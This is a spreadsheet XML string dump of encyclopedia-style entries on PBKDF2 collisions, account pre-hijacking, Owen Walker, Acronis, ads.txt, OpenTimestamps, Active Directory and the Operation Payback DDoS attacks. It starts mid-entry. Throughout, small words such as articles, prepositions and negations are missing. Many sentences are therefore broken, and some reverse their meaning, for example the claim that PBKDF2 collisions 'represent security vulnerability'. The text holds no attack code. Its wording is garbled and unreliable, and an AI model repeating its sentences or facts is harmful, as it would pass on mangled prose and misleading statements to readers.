plnlrtfpijpuhqylxbgqiiyipieyxvfsavzgxbbcfusqkozwpngsyejqlmjsytrmdtherefore (when example using hmac-sha1) pre-hashed using sha-1 into: sha1 (hex): 65426b585154667542717027635463617226672awhich represented ascii sha1 (ascii): ebkxqtfubqp'ctcar&amp;g*this means regardless salt iterations, pbkdf2-hmac-sha1 generate bytes passwords: "plnlrtfpijpuhqylxbgqiiyipieyxvfsavzgxbbcfusqkozwpngsyejqlmjsytrmd" "ebkxqtfubqp'ctcar&amp;g*"for example, using: prf: hmac-sha1 salt: a009c1a485912c6ae630d3e744240b04 iterations: 1,000 derived length: bytesthe following function calls: pbkdf2-hmac-sha1("plnlrtfpijpuhqylxbgqiiyipieyxvfsavzgxbbcfusqkozwpngsyejqlmjsytrmd", ...) pbkdf2-hmac-sha1("ebkxqtfubqp'ctcar&amp;g*", ...) generate derived bytes (17eb4014c8c461c300e9b61518b9a18b). these derived collisions represent security vulnerability still must know original password order generate hash password. alternatives pbkdf2 weakness pbkdf2 number iterations adjusted make take arbitrarily large amount computing time, implemented small circuit little ram, makes brute-force attacks using application-specific integrated circuits graphics processing units relatively cheap. bcrypt password hashing function requires larger amount (but still tunable separately, i.e. fixed given amount time) slightly stronger attacks, modern scrypt derivation function arbitrarily large amounts memory therefore resistant asic attacks.in 2013, password hashing competition (phc) held develop resistant approach. july 2015 argon2 selected final winner, special recognition given four password hashing schemes: catena, lyra2, yescrypt makwa. another alternative balloon hashing, recommended nist password guidelines. also list pbkdf2 implementations references external links "pkcs v2.1" (pdf). laboratories. archived original (pdf) april 2017. 2898 specification pkcs v2.0. 6070 test vectors pbkdf2 hmac-sha1. nist special publication 800-132 recommendation password-based derivation</t>
  </si>
  <si>
    <t>Account pre-hijacking</t>
  </si>
  <si>
    <t>account pre-hijacking attacks class security exploit related online services. they involve anticipating user signing online service signing service name, taking account attempt register themselves. pre-hijacking first identified class vulnerabilities 2022, based research funded microsoft's security response center.out online services surveyed, found vulnerable various forms exploit. vulnerable services included dropbox, instagram, linkedin, wordpress zoom. existence vulnerability reported service providers publication paper. references also single sign-on federated identity</t>
  </si>
  <si>
    <t>Against DRM license</t>
  </si>
  <si>
    <t>against free copyleft license artworks. first free content license contains clause related rights clause digital rights management (drm). first clause authorizes licensee exercise related rights, second clause prevents drm. licensor uses drm, license applicable work; licensee uses drm, license automatically void. external links against license version internet archive, archived march 27th, 2017 free creations website internet archive, archived march 27th, 2017 readers' bill rights digital books</t>
  </si>
  <si>
    <t>One-time authorization code</t>
  </si>
  <si>
    <t>Owen Walker</t>
  </si>
  <si>
    <t>owen thor walker (online pseudonym akill) computer hacker living zealand, discharged without conviction despite pleading guilty several charges 'cybercrime'. 2008 admitted ringleader international hacking organization estimated caused million worth damage. history walker home-schooled received formal computer training, instead teaching programming encryption. diagnosed asperger's syndrome. arrest walker arrested sections 248-252 zealand's crime international investigations found involved attack computer network university pennsylvania. attack orchestrated botnet established walker, using servers exploited rented, majority located malaysia. trial pleaded guilty connection crime, fined cost damage university pennsylvania computer discharged without conviction, presiding judge concluded conviction would harm future. employment 2008 hired telstraclear, zealand subsidiary australian telecommunications company telstra, work security division dmzglobal. security consultant, presented seminars appeared advertising. telstraclear spokesman chris mirams said equivalent hiring bank robber advise bank security. references</t>
  </si>
  <si>
    <t>Acronis Cyber Protect Home Office</t>
  </si>
  <si>
    <t>acronis cyber protect home office (previously known acronis true image) software package produced acronis international gmbh aims protect system ransomware allows users backup restore files entire systems backup archive, previously created using software. since 2020, acronis cyber protect home office includes malware zoom protection (though ability features depends subscription purchased). software used technicians deploy operating systems computers academics help restore computers following analysis viruses infect computers. features backup acronis create types backup archives: file backups (which consist user-specified files directories (but metadata disk partition)) full system images (which consist files, directories disk metadata). software create full disk backup archives several file systems including: ntfs (windows); fat32 (windows removable media); macintoish systems (hfs+ apfs) linux systems (ext2, ext3, ext4; reiserfs, linux swap). acronis falls back using sector-by-sector copy non-supported filesystem backed acronis agent installed within operating system, allows backups performed background computer used. local backup acronis back computer, selected disks selected files local location specified user. software perform full, differential incremental backups. full creates backup archive every time backs everything specified user. differential backups backup changes made since latest full backup incremental backs changes made since last incremental backup. incremental backups chain loss incremental backups renders entire backup useless. prior acronis true image 2020, incremental backups stored individually separate files made difficult manage. since 2020, acronis stores backups single archive file tibx extension. cloud backup (subscription users only) users specify store backup archives acronis's data centers around globe. users subscribe software year rather buying copy software receive cloud storage used store cloud-based backups. 2019, premium users receive terabyte cloud space. recovery restoration acronis cyber protect home office allows users restore files full disk file-based archive using either preinstallation media acronis within user interface program. protected system files restored (e.g. restoring entire system earlier state), system restarts perform recovery operation. users also mount backup archive, allows users browse contents archive manner similar browsing disk drive. disk cloning software clone contents physical storage device (e.g. ssd, nvme) another drive. drive need formatted data cloned smaller size source disk amount space disk must least size amount data cloned. cloning aims preserve disk metadata. example, disk cloning useful installing larger disk computer replacing hard disk drive solid state drive. crucial recommends using preinstallation media acronis perform clone avoid possible cloning failures partitions inaccessible.some hard disk manufacturers including western digital, intel seagate provide customized variants acronis true image drives allows user clone existing disk another disk, typically manufacturer. reverting changes acronis allows users protect selected disk drives unintended changes revert change undesired. this used instead virtual machines create stable secure environments quickly reverted within software. limitations possible incompatibility versions prior acronis true image 2020, backup archives stored using proprietary format .tib file extension windows systems. this, compatibility guaranteed products within version. older versions software cannot read backup archives created using newer version. unwanted advertisements limitation software inability disable taskbar popups marketing upgrades products developer. notification grab focus (i.e. interrupt full screen game movie) advertisement must disabled individually. company currently offers permanently turn advertisements. backup management managing backup archives created using acronis cyber protect home office software challenging expert users want conjunction software manage backups. example, software recognize backups deleted using external software. uses academia acronis used cybersecurity researchers conduct analysis computer viruses faster using alternative techniques virtualisation. technicians acronis used computer technicians deploy common system image group computers. example, preinstallation media acronis allows user create full disk backup archives given system without needing install agent system cloned. history acronis began 2001 division swsoft 2003 became separate company continued release acronis true image software. true image name applied platforms home corporate 2010, acronis business backup software renamed, true image home version. 2020, security features integrated product acronis argued name change necessary reflect changes. acronis true image (2003–2021) prior acronis true image business-focused product acronis backup acronis cyber protect shared name home product minor exception business versions called acronis true image server. later server backup software renamed "acronis backup". versions table summarizes changes versions acronis. similar products acronis also produce series similar backup solutions businesses including: acronis cyber protect (previously called acronis backup acronis true image server) acronis cyber cloud also comparison disk cloning software disk cloning references</t>
  </si>
  <si>
    <t>Ads</t>
  </si>
  <si>
    <t>ads.txt (authorized digital sellers) initiative technology laboratory. specifies text file companies host servers, listing companies authorized sell products services. this designed allow online buyers check validity sellers buy, purposes internet fraud prevention. state adoption november 2017, publishers ads.txt files. more 90,000 sites using ads.txt, 3,500 september 2017, according pixalate. among 1,000 sites sold programmatic ads, percent ads.txt files, compared percent september, pixalate.latest adoption data firstimpression.io's ads.txt industry dashboard: google active proponent ads.txt pushing faster, widespread adoption publishers. from october 2017 google display video buys inventory sources identified authorized sellers publisher’s ads.txt file, file available. ads.txt become requirement display video 360. file format iab's ads.txt specification dictates formatting ads.txt files contain three types record; data records, variables comments. ads.txt file include number records, placed line. since ads.txt file format must adhered range validation, management collaboration tools become available help ensure ads.txt files created correctly. latest specification v1.0.2 recommends using placeholder record indicate intent empty ads.txt file: placeholder.example.com, placeholder, direct, placeholder also online advertising robots.txt security.txt references</t>
  </si>
  <si>
    <t>OpenTimestamps</t>
  </si>
  <si>
    <t>opentimestamps (ots) open-source project aims provide standard format blockchain timestamping. with advent systems like bitcoin, possible create verify proofs existence documents (timestamps) without relying trusted third party; represents enhancement term security, since excludes possibility malicious careless) trusted third party compromise timestamp.ots defines rules conveniently creating timestamps later independently verifying them. currently, timestamping bitcoin fully supported, however format flexible enough support variety methods.anyone could create timestamp permissionless blockchain paying transaction fees, convenience built infrastructure aggregates timestamp requests users packs transactions funded public calendar servers; result, users timestamp free, trust-minimized setting. what timestamp timestamp proof data existed prior certain point time.to create proof, turns necessary publish blockchain, would expensive, enough commit blockchain. such commitment proves existed prior certain block, sense changes, proof becomes invalid hence useless. proof consists sequence commitment operations, sha256, append, prepend. these operations cryptographic path proves commits certain block header. words, caused block header value, indeed, different then, mathematical properties commitment operations, block header would different. verify commitment, operations applied sequence data result, transaction merkle root, checked equal observed blockchain; check goes fine, assert existed prior block. timestamped file hello.txt, proof encoded file named hello.txt.ots contains: hash timestamped file; commitment operations; attestations blockchain.with information, challenger independently verify hello.txt existed prior certain block. usage provides users multiple easy ways create independently verify timestamps: with opentimestamps-client python; with java-opentimestamps; with javascript-opentimestamps; opentimestamps.org.in following sections shown example usage python client. timestamp creation stamp operation creates first version timestamp. applied file want prove existence (original file). stamp operation calculates sha256 hash original file, concatenates random 128-bit nonce maintain privacy, recalculates sha256 hash, sending unique value calendar servers. each calendar servers received hash merkle tree return necessary response generate initial file. this file still incomplete contain record blockchain.once reasonable time elapsed, user upgrade operation file. this communicate calendar servers update file bitcoin block header attestation. also possible create timestamps several different files simultaneously. case, stamp operation send single request calendar servers merkle root derived original files, later, operation calculate merkle tree paths create timestamps original files. timestamp verification verification proof requires file original file. user must also up-to-date bitcoin node machine perform verification without relying trusted third parties. show timestamp information basic structure timestamp divided three main sections: file hash merkle tree construction bitcoin block header attestationthe timestamp saved binary file save space avoid problems interpretation, encoding compatibility systems. generally, file .ots extension magic number \x00 \x00 \x00 \x00 \xbf \x89 \xe2 \xe8 \x84 \xe8 \x92 \x94.the info operation presents content timestamp human-readable format. case, single attestation hello.txt file shown, hashes bitcoin block header block 518387. cases applications include defensive publications. notes references</t>
  </si>
  <si>
    <t>Optoutprescreen.com</t>
  </si>
  <si>
    <t>optoutprescreen.com joint venture among equifax, experian, innovis, transunion, allowing customers receiving credit card solicitations mail.under fair credit reporting (fcra), consumer reporting agencies permitted include customers' names lists used creditors insurers make offers credit insurance initiated customer. fcra also provides customers right out, prevents consumer reporting agencies providing credit file information others.beginning august 2005, fair accurate credit transactions 2003 took effect, amended fcra require consumer reporting agencies include credit offers statement allowing customers stop unsolicited offers either phone (1-888-5optout 1-888-567-8688) https://www.optoutprescreen.com/the process allows users choose three options: opt-in: your name eligible inclusion lists used firm offers credit insurance. electronic opt-out years: your name eligible inclusion lists used firm offers credit insurance five years. permanent opt-out mail: your name longer eligible inclusion lists firm offers credit insurancein order permanently opt-out unsolicited offers, must stamp print mail physical paper permanent opt-out election form. there option permanently electronically. optoutprescreen.com website accessible users isps located outside united states u.s. territories. references external links http://www.optoutprescreen.com https://www.experian.com/blogs/ask-experian/credit-education/faqs/preapproved-credit-offers/opt-out/</t>
  </si>
  <si>
    <t>Active Directory</t>
  </si>
  <si>
    <t>active directory (ad) directory service developed microsoft windows domain networks. included windows server operating systems processes services. initially, active directory used centralized domain management. however, active directory eventually became umbrella title broad range directory-based identity-related services.a server running active directory domain service role called domain controller. authenticates authorizes users computers windows domain type network, assigning enforcing security policies computers, installing updating software. example, user logs computer part windows domain, active directory checks submitted username password determines whether user system administrator normal user. also, allows management storage information, provides authentication authorization mechanisms establishes framework deploy related services: certificate services, active directory federation services, lightweight directory services, rights management services.active directory uses lightweight directory access protocol (ldap) versions microsoft's version kerberos, dns. history like many information-technology efforts, active directory originated democratization design using request comments (rfcs). internet engineering task force (ietf), oversees process, accepted numerous rfcs initiated widespread participants. example, ldap underpins active directory. also, x.500 directories organizational unit preceded active directory concept makes methods. ldap concept began emerge even founding microsoft april 1975, rfcs early 1971. rfcs contributing ldap include 1823 ldap api, august 1995), 2307, 3062, 4533.microsoft previewed active directory 1999, released first windows 2000 server edition, revised extend functionality improve administration windows server 2003. active directory support also added windows windows windows patch, features unsupported. additional improvements came subsequent versions windows server. windows server 2008, additional services added active directory, active directory federation services. part directory charge management domains, previously core part operating system, renamed active directory domain services (adds) became server role like others. "active directory" became umbrella title broader range directory-based services. according byron hynes, everything related identity brought active directory's banner. active directory services active directory services consist multiple directory services. best known active directory domain services, commonly abbreviated simply domain services active directory domain services foundation stone every windows domain network. stores information members domain, including devices users, verifies credentials defines access rights. server running service called domain controller. domain controller contacted user logs device, accesses another device across network runs line-of-business metro-style sideloaded device. other active directory services (excluding lds, described below) well microsoft server technologies rely domain services; examples include group policy, encrypting file system, bitlocker, domain name services, remote desktop services, exchange server sharepoint server. self-managed active directory must confused managed azure cloud product. lightweight directory services active directory lightweight directory services lds), formerly known active directory application mode (adam), implementation ldap protocol runs service windows server. shares code base provides functionality, including identical api, require creation domains domain controllers. provides data store storage directory data directory service ldap directory service interface. unlike however, multiple instances server. certificate services active directory certificate services establishes on-premises public infrastructure. create, validate revoke public certificates internal uses organization. these certificates used encrypt files (when used encrypting file system), emails (per s/mime standard), network traffic (when used virtual private networks, transport layer security protocol ipsec protocol). predates windows server 2008, name simply certificate services.ad requires infrastructure. federation services active directory federation services single sign-on service. with infrastructure place, users several web-based services (e.g. internet forum, blog, online shopping, webmail) network resources using credentials stored central location, opposed granted dedicated credentials service. uses many popular open standards pass token credentials saml, oauth openid connect. supports encryption signing saml assertions. fs's purpose extension latter enables users authenticate devices part network, using credentials. former enables credentials different network. name suggests, works based concept federated identity. requires infrastructure, although federation partner not. rights management services active directory rights management services rms, known rights management services windows server 2008) server software information rights management shipped windows server. uses encryption form selective functionality denial limiting access documents corporate e-mails, microsoft word documents, pages, operations authorized users perform them. these operations include viewing, editing, copying, saving printing example. administrators create pre-set templates convenience user required. however, users still define access content question logical structure directory service, active directory instance consists database corresponding executable code responsible servicing requests maintaining database. executable part, known directory system agent, collection windows services processes windows 2000 later. objects active directory databases accessed ldap, adsi component object model interface), messaging security accounts manager services. objects active directory structures arrangements information objects. objects fall broad categories: resources (e.g., printers) security principals (user computer accounts groups). security principals assigned unique security identifiers (sids). each object represents single entity—whether user, computer, printer, group—and attributes. certain objects contain objects. object uniquely identified name attributes—the characteristics information object represents— defined schema, also determines kinds objects stored active directory. schema object lets administrators extend modify schema necessary. however, schema object integral definition active directory objects, deactivating changing objects fundamentally change disrupt deployment. schema changes automatically propagate throughout system. once created, object deactivated—not deleted. changing schema usually requires planning. forests, trees, domains active directory framework holds objects viewed number levels. forest, tree, domain logical divisions active directory network. within deployment, objects grouped domains. objects single domain stored single database (which replicated). domains identified name structure, namespace. domain defined logical group network objects (computers, users, devices) share active directory database. tree collection domains domain trees contiguous namespace linked transitive trust hierarchy. structure forest. forest collection trees share common global catalog, directory schema, logical structure, directory configuration. forest represents security boundary within users, computers, groups, objects accessible. organizational units objects held within domain grouped organizational units (ous). provide hierarchy domain, ease administration, resemble organization's structure managerial geographical terms. contain ous—domains containers sense. microsoft recommends using rather domains structure simplifying implementation policies administration. recommended level apply group policies, active directory objects formally named group policy objects (gpos), although policies also applied domains sites (see below). level administrative powers commonly delegated, delegation performed individual objects attributes well. organizational units separate namespace. consequence, compatibility legacy netbios implementations, user accounts identical samaccountname allowed within domain even accounts objects separate ous. this samaccountname, user object attribute, must unique within domain. however, users different common name (cn), name stored directory "fred.staff-ou.domain" "fred.student-ou.domain", "staff-ou" "student-ou" ous. general, reason lack allowance duplicate names hierarchical directory placement microsoft primarily relies principles netbios, flat-namespace method network object management that, microsoft software, goes back windows ms-dos manager. allowing duplication object names directory, completely removing netbios names, would prevent backward compatibility legacy software equipment. however, disallowing duplicate object names violation ldap rfcs active directory supposedly based. number users domain increases, conventions "first initial, middle initial, last name" (western order) reverse (eastern order) fail common family names like (李), smith garcia. workarounds include adding digit username. alternatives include creating separate system unique employee/student numbers account names place actual users' names allowing users nominate preferred word sequence within acceptable policy. because duplicate usernames cannot exist within domain, account name generation poses significant challenge large organizations cannot easily subdivided separate domains, students public school system university must able computer across network. shadow groups microsoft's active directory, confer access permissions, objects placed within automatically assigned access privileges based containing this design limitation specific active directory. other competing directories novell assign access privileges object placement within active directory requires separate step administrator assign object member group also within relying location alone determine access permissions unreliable, object assigned group object common workaround active directory administrator write custom powershell visual basic script automatically create maintain user group directory. scripts periodically update group match ou's account membership unable instantly update security groups anytime directory changes, occurs competing directories security directly implemented directory itself. such groups known shadow groups. once created, shadow groups selectable place administrative tools. microsoft refers shadow groups server 2008 reference documentation explain create them. there built-in server methods console snap-ins managing shadow groups.the division organization's information infrastructure hierarchy domains top-level decision. common models business unit, geographical location, service, object type hybrids these. structured primarily facilitate administrative delegation, secondarily, facilitate group policy application. although form administrative boundary, true security boundary forest administrator domain forest must trusted across domains forest. partitions active directory database organized partitions, holding specific object types following specific replication pattern. microsoft often refers partitions 'naming contexts'. 'schema' partition contains definition object classes attributes within forest. 'configuration' partition contains information physical structure configuration forest (such site topology). both replicate domains forest. 'domain' partition holds objects created domain replicates within domain. physical structure sites physical (rather logical) groupings defined subnets. also holds definitions connections, distinguishing low-speed (e.g., wan, vpn) high-speed (e.g., lan) links. site definitions independent domain structure common across forest. sites used control network traffic generated replication also refer clients nearest domain controllers (dcs). microsoft exchange server 2007 uses site topology mail routing. policies also defined site level. physically, active directory information held peer domain controllers, replacing pdc/bdc model. each copy active directory. servers joined active directory domain controllers called member servers. subset objects domain partition replicate domain controllers configured global catalogs. global catalog (gc) servers provide global listing objects forest. global catalog servers replicate objects domains and, hence, provide global listing objects forest. however, minimize replication traffic keep gc's database small, selected attributes object replicated. this called partial attribute (pas). modified modifying schema marking attributes replication earlier versions windows used netbios communicate. active directory fully integrated requires tcp/ip—dns. fully functional, server must support resource records, also known service records. replication active directory synchronizes changes using multi-master replication. replication default 'pull' rather 'push', meaning replicas pull changes server change effected. knowledge consistency checker (kcc) creates replication topology site links using defined sites manage traffic. intra-site replication frequent automatic result change notification, triggers peers begin pull replication cycle. inter-site replication intervals typically less frequent change notification default, although configurable made identical intra-site replication. each link 'cost' (e.g., ds3, isdn, etc.) alters site link topology accordingly. replication occur transitively several site links same-protocol site link bridges, cost low, although automatically costs direct site-to-site link lower transitive connections. site-to-site replication configured occur bridgehead server site, replicates changes within site. replication active directory zones automatically configured activated domain-based site. replication active directory uses remote procedure calls (rpc) (rpc/ip). between sites, smtp used replication, changes schema, configuration, partial attribute (global catalog) gcs. smtp cannot used replicating default domain partition. implementation general, network utilizing active directory licensed windows server computer. backup restore active directory possible network single domain controller, microsoft recommends domain controller provide automatic failover protection directory. domain controllers also ideally single-purpose directory operations only, software role.certain microsoft products server exchange interfere operation domain controller, necessitating isolation products additional windows servers. combining make configuration troubleshooting either domain controller installed software difficult. business intending implement active directory therefore recommended purchase number windows server licenses, provide least separate domain controllers, optionally, additional domain controllers performance redundancy, separate file server, separate exchange server, separate server, forth support various server roles. physical hardware costs many separate servers reduced virtualization, although proper failover protection, microsoft recommends running multiple virtualized domain controllers physical hardware. database active-directory database, directory store, windows 2000 server uses blue-based extensible storage engine (ese98) limited terabytes billion objects (but billion security principals) domain controller's database. microsoft created ntds databases billion objects. (nt4's security account manager could support 40,000 objects). called ntds.dit, main tables: data table link table. windows server 2003 added third main table security descriptor single instancing.programs access features active directory interfaces provided active directory service interfaces. trusting allow users domain access resources another, active directory uses trusts.trusts inside forest automatically created domains created. forest sets default boundaries trust, implicit, transitive trust automatic domains within forest. terminology one-way trust domain allows access users another domain, domain allow access users first domain. two-way trust domains allow access users domains. trusted domain domain trusted; whose users access trusting domain. transitive trust trust extend beyond domains trusted domains forest. intransitive trust trust extend beyond domains. explicit trust trust admin creates. transitive only. cross-link trust explicit trust domains different trees tree descendant/ancestor (child/parent) relationship exist domains. shortcut joins domains different trees, transitive, one- two-way. forest trust applies entire forest. transitive, one- two-way. realm transitive nontransitive (intransitive), one- two-way. external connect forests non-active directory domains. nontransitive, one- two-way. trust one-way trust used microsoft identity manager (possibly low-level) production forest (windows server 2016 functionality level) 'bastion' forest, issues time-limited group memberships. management tools microsoft active directory management tools include: active directory administrative center (introduced windows server 2012 above), active directory users computers, active directory domains trusts, active directory sites services, adsi edit, local users groups, active directory schema snap-ins microsoft management console (mmc), sysinternals adexplorerthese management tools provide enough functionality efficient workflow large environments. some third-party tools extend administration management capabilities. they provide essential features convenient administration process, automation, reports, integration services, etc. unix integration varying levels interoperability active directory achieved unix-like operating systems (including unix, linux, java unix-based programs) standards-compliant ldap clients, systems usually interpret many attributes associated windows components, group policy support one-way trusts. third parties offer active directory integration unix-like platforms, including: powerbroker identity services, formerly likewise (beyondtrust, formerly likewise software) allows non-windows client join active directory admitmac (thursby software systems) samba (free software gplv3) domain controllerthe schema additions shipped windows server 2003 include attributes closely enough 2307 generally usable. reference implementation 2307, nss_ldap pam_ldap provided padl.com, support attributes directly. default schema group membership complies 2307bis (proposed). windows server 2003 includes microsoft management console snap-in creates edits attributes. alternative option another directory service non-windows clients authenticate windows clients authenticate active directory. non-windows clients include directory server (formerly fedora directory server, fds), viewds v7.2 enabled directory, microsystems java system directory server. latter able perform two-way synchronization active directory thus provide "deflected" integration. another option openldap translucent overlay, extend entries remote ldap server additional attributes stored local database. clients pointed local database entries containing remote local attributes, remote database remains completely untouched.administration (querying, modifying, monitoring) active directory achieved many scripting languages, including powershell, vbscript, jscript/javascript, perl, python, ruby. free non-free active directory administration tools help simplify possibly automate active directory management tasks. since october 2017 amazon offers integration microsoft active directory. also agdlp (implementing role based access controls using nested groups) apple open directory flexible single master operationfreeipa list ldap software system security services daemon (sssd) univention corporate server references external links microsoft technet: white paper: active directory architecture (single technical document gives overview active directory.) microsoft technet: detailed description active directory windows server 2003 microsoft msdn library: [ms-adts]: active directory technical specification (part microsoft open specification promise) active directory application mode (adam) microsoft msdn: [ad-lds]: active directory lightweight directory services microsoft technet: [ad-lds]: active directory lightweight directory services microsoft msdn: active directory schema microsoft technet: understanding schema microsoft technet magazine: extending active directory schema microsoft msdn: active directory certificate services microsoft technet: active directory certificate services</t>
  </si>
  <si>
    <t>Operation Payback</t>
  </si>
  <si>
    <t>operation payback coordinated, decentralized group attacks high-profile opponents internet piracy internet activists using "anonymous" moniker. operation payback started retaliation distributed denial service (ddos) attacks torrent sites; piracy proponents decided launch ddos attacks piracy opponents. initial reaction snowballed wave attacks major pro-copyright anti-piracy organizations, firms, individuals. following united states diplomatic cables leak december 2010, organizers commenced ddos attacks websites banks withdrawn banking facilities wikileaks. background initial attacks 2010, several bollywood companies hired aiplex software launch ddos attacks websites respond takedown notices. piracy activists created operation payback september 2010 retaliation. original plan attack aiplex software directly, upon finding hours planned ddos another individual taken firm's website own, operation payback moved launching attacks websites copyright stringent organisations motion picture association america (mpaa) international federation phonographic industry, giving websites combined total downtime hours. following days, operation payback attacked multitude sites affiliated mpaa, recording industry association america (riaa), british phonographic industry. firms acs:law, davenport lyons dunlap, grubb weaver copyright group) also attacked. attacks recording industry firms september 2010, website united kingdom firm acs:law subjected ddos attack part operation payback. when asked attacks, andrew crossley, owner acs:law, said: hours. concern fact train turning minutes late queue coffee wasting time sort rubbish."when site came back online 350mb file, backup site, visible anyone short period time. backup, included copies emails sent firm, downloaded made available various peer-to-peer networks websites including pirate bay. some emails contained unencrypted excel spreadsheets, listing names addresses people acs:law accused illegally sharing media. contained 5,300 broadband customers accused illegally sharing pornography, another contained details 8,000 customers plusnet customers accused infringing copyright music sharing peer-to-peer networks. this alleged breach data protection become part ongoing investigation acs:law information commissioner's office.on september leesburg, virginia office dunlap, grubb weaver firm also business "u.s. copyright group" evacuated police emailed bomb threat received. it's believed event could connected anonymous. non-related copyright firms sites, websheriff.com, also attacked. these attacks originally organized internet relay chat channel. attacks also became popular topic twitter. australian pro-copyright organization september 2010, ddos attack australian federation against copyright theft (afact) unintentionally brought 8,000 small websites hosted server. acapor september 2010, attempt ensure portuguese citizens can't access thepiratebay.org, associação comércio audiovisual portugal (acapor) filed complaint pirate bay. complaint filed general inspection cultural activities, part portuguese ministry culture. according movie rental association, pirate directly responsible million illegal downloads portugal every year. installing pirate block isps, acapor hoped decrease financial damage claims pirate causes.on october 2010, acapor website defaced, presenting text operation payback redirect pirate seconds. addition defacing website, copy email database acapor uploaded pirate bay. leaked e-mails revealed acapor's methods denunciation, dissatisfaction portuguese government justice system, perception copyright debate war, antagonism isps. acapor claimed "the business isps illegal downloading." more attacks october 2010, operation payback launched attack ministry sound website gallant macmillan website.on october 2010, attacked website spanish copyright society, sgae.es. october 2010, total downtime websites attacked operation payback 537.55 hours.on october 2010, copyprotected.com injected defaced, three days later operation payback launched ddos attack intellectual property office.production companies satelfilm.at wega-film.at "drive-by" ddoses october 2010, response efforts gain court injunction refused block movie-streaming website, operation payback knocked porn website hustler.com offline following day. musician copyright advocate during 2010 mipcom convention, gene simmons kiss stated: make sure brand protected make sure incursions. litigious. everybody. take homes, cars. don't anybody cross line. response simmons' comments, members operation payback switched attentions websites, simmonsrecords.com genesimmons.com, taking offline total hours. point course ddos, genesimmons.com hacked redirected thepiratebay.org. response attack simmons wrote: some heard popcorn farts sites threatened hackers. legal team case found few, shall "adventurous" young people, feel law. and, stated mipcom speech, pants off. first, punished. second, might find little butts jail, right next someone who's years looking girl friend. soon printing names pictures. find you. cannot hide. stay tuned this additional attacks subsequently downtime websites. later, simmons's message removed website. more year later, december 2011, person supposedly known nickname "spydr101" arrested relation attack genesimmons.com. charged conspiracy unauthorized impairment protected computer. riaa october 2010, limewire ordered disable "searching, downloading, uploading, file trading and/or file distribution functionality" losing court battle riaa claims copyright infringement. satisfied injunction, riaa announced intention continue arista records lime group trial recover damages caused program. retaliation, members operation payback announced would attack riaa's website october despite fact group typically target twice. october riaa.org indeed taken offline denial-of-service attack. after attack, riaa.com riaa.org sites inaccessible europe. operation payback's main site attacked later day, subsequently moved website tieve.tk anonops.net.during damages phase limewire trial, riaa attempted switch seeking statutory damages per-work seeking per-infringement, quote total damage amount, method calculating number infringements. judge case rejected proposal, holding case supported statutory damages per-work basis large-scale infringement, thus capping potential award $1.5 billion. march 2011, four days ruling, report appeared law.com highlighting judge's remark per-infringement award sought record companies might total "trillions"; report estimated trillion attention-grabbing headline (usa's nominal 2012-2013 $16–17 trillion). this figure repeated magazine march operation payback call-to-arms followed, citing trillion figure still actively sought riaa, ddos attack riaa website commenced march november 2010 attacks around october 2010, group website intention coordinating protests around world raise awareness cause. date protest activities november intended gunpowder plot, anonymous heavily affiliates fawkes masks. protest activity included attack united states copyright office, launched investigation. they later arrested person accused taking part attack paypal. hiatus resumption website attacks november 2010, operation payback temporarily ceased attacking websites. hiatus lasted four months, ending early march 2011 attack temporarily took website bmi, prominent collection society operating behalf music publishers. this followed aforementioned second attack riaa website. sarah palin december 2010, politician sarah palin announced website personal credit card information compromised. palin's team believed attack executed anonymous, though anonymous never commented palin possible target attack. palin's technical team posted screenshot server file showing wikileaks.org url. visa attacks denial service attacks, credit card data compromised. unknown whether palin's card compromised part broad attack visa specific attack palins. operation avenge assange december 2010, wikileaks came intense pressure stop publishing secret u.s. diplomatic cables. corporations amazon, paypal, bankamerica, swiss bank postfinance, mastercard visa either stopped working froze customers' donations wikileaks political pressures. response, behind operation payback directed activities companies. operation payback launched ddos attacks paypal, postfinance swedish prosecution authority. december 2010, coordinated ddos attack operation payback brought mastercard visa websites. december 2010, prior sustained ddos attack paypal website caused minor slowdown service, paypal announced blog would release frozen funds account holland foundation raising funds wikileaks, would reactivate account. regarding attacks, wikileaks spokesman kristinn hrafnsson denied relation group said, neither condemn applaud attacks. believe reflection public opinion actions targets." day, 16-year-old arrested hague, netherlands, connection distributed denial-of-service attacks mastercard paypal. operator nickname jeroenz0r.on december 2010, daily telegraph reported anonymous threatened disrupt british government websites assange extradited sweden. anonymous issued press release attempt clarify issue.electronic frontier foundation co-founder john perry barlow described attacks "the shot heard round world—this lexington."the following list sites domains known targeted: operation payback's attempt take amazon.com aborted failed recruit enough users botnet; noted massive amazon website almost impossible crash."in late december, began raid suspected participants operation payback.at beginning 2011, operation payback brought zimbabwean government websites zimbabwean president's wife sued newspaper million publishing wikileaks cable linked alleged trade illicit diamonds. january 2011, five males aged arrested early morning raids u.k. suspicion involvement, executed search warrants day. criticism united kingdom intellectual property office said site attacked, responsible depriving citizens access information democratic right access. other critics claimed attacks restricted gene simmons' right free speech.a spokesman mpaa said, "it's troubling groups seem concerned rights steal copy films, music, books, creative resources rights american workers producing products."there also criticism pirate party united states pirate party, joint public statement urged group "immediately cease distributed denial-of-service (ddos) attacks instead seek legal method express frustration disquiet copyright industry, perversions copyright personal gain."while acknowledging ddos attacks credit card banking sites serve political protests, cyber experts said operation payback done long-term damage: sites back online, people still continuing credit cards make payments. "this like noisy political demonstration, like surrounding bank refusing anyone out" said cyber expert. tools communication operation payback members used modified version orbit cannon (loic) execute ddos attacks. september 2010, "hive mind" mode added loic. while hive mind mode, loic connects irc, controlled remotely. this allows computers loic installed behave part botnet. utilising tool, coordinators operation payback able quickly take websites belonging anti-piracy groups. botnets sizes also used.members operation payback reportedly used channel communicate targets select, instructions attacking targets produced posted various imageboards (4chan/7chan/711chan/420chan/808chan). media twitter facebook also utilized coordination, december 2010, operation payback's facebook page removed official twitter account suspended. additionally federal court order forced encyclopedia dramatica delete operation payback article, featured detailed history operation, including personal information individuals associated companies attacked federal indictment october 2013, members operation payback indicted federal court alexandria, virginia co-conspirators violation u.s.c. u.s.c. 1030. 2014, members received plea deal, reducing felony charges single misdemeanor. defendants penalized jail sentences, defendant community service. also february 2010 australian cyberattacks hacktivism operation leakspin project chanology references external links anonops main coordination website operation payback (disfunctioning) anonops network main network anonymous resides pandalabs.pandasecurity.com chronicle operation payback events</t>
  </si>
  <si>
    <t>Operation Protect Our Children</t>
  </si>
  <si>
